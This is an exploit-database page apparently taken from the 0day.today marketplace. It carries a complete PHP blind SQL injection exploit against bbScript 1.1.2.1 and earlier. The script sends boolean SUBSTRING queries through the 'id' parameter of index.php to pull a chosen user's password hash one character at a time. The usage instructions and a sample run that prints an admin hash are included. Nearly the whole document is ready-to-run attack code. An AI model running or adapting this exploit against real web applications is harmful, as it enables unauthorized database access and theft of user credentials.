[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit

Author
cOndemned
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10534
Category
web applications
Date add
31-12-2009
Platform
unsorted
====================================================
bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit
====================================================

<?php
 
/*
 
bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit
Bug found && exploited by cOndemned
Greetz: All friends, TWT, SecurityReason Team, Scruell ;*
 
Download: http://www.bbscript.com/download.php
Note: You have to be logged into in order to download this script
 
 
/[bbScript_path]/index.php?action=showtopic&id=1+and+1=1--  TRUE    (normal)
/[bbScript_path]/index.php?action=showtopic&id=1+and+1=2--  FALSE   (error)
 
 
example:
 
condemned@agonia:~$ php bbscript-poc.php http://localhost/audits/bbScript admin
 
[~] bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit
[~] Bug found && exploited by cOndemned
[~] Target username set to admin
[~] Password Hash : 596a96cc7bf9108cd896f33c44aedc8a
[~] Done
 
*/
 
     
function concat($string)
{
    $length = strlen($string);
    $output = '';
 
    for($i = 0; $i < $length; $i++) $output .= sprintf("CHAR(%d),", ord($string[$i]));
 
    return 'CONCAT(' . substr($output, 0, -1) . ')';
}
 
echo "\n[~] bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit";
echo "\n[~] Bug found && exploited by cOndemned\n";
 
if($argc != 3)
{
    printf("[!] Usage: php %s <target> <login>\n\n", $argv[0]);
    exit;
}
 
list(, $target, $login) = $argv;
 
echo "[~] Target username set to $login\n";
     
$login = concat($login);
$chars = array_merge((array)$chars, range(48, 57), range(97, 102));
$pos   = 1;
 
echo "[~] Password Hash : ";
 
while($pos != 33)
{
    for($i = 0; $i <= 16; $i++)
    {
        $query  = "/index.php?action=showtopic&id=1+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username=$login),$pos,1)=CHAR({$chars[$i]})--";
 
        if(!preg_match('#Error#', file_get_contents($target . $query), $resp))
        {
            printf("%s", chr($chars[$i]));
            $pos++;
            break;
        }
    }
}
 
echo "\n[~] Done\n\n";
 
?>



#  0day.today [2024-09-28]  #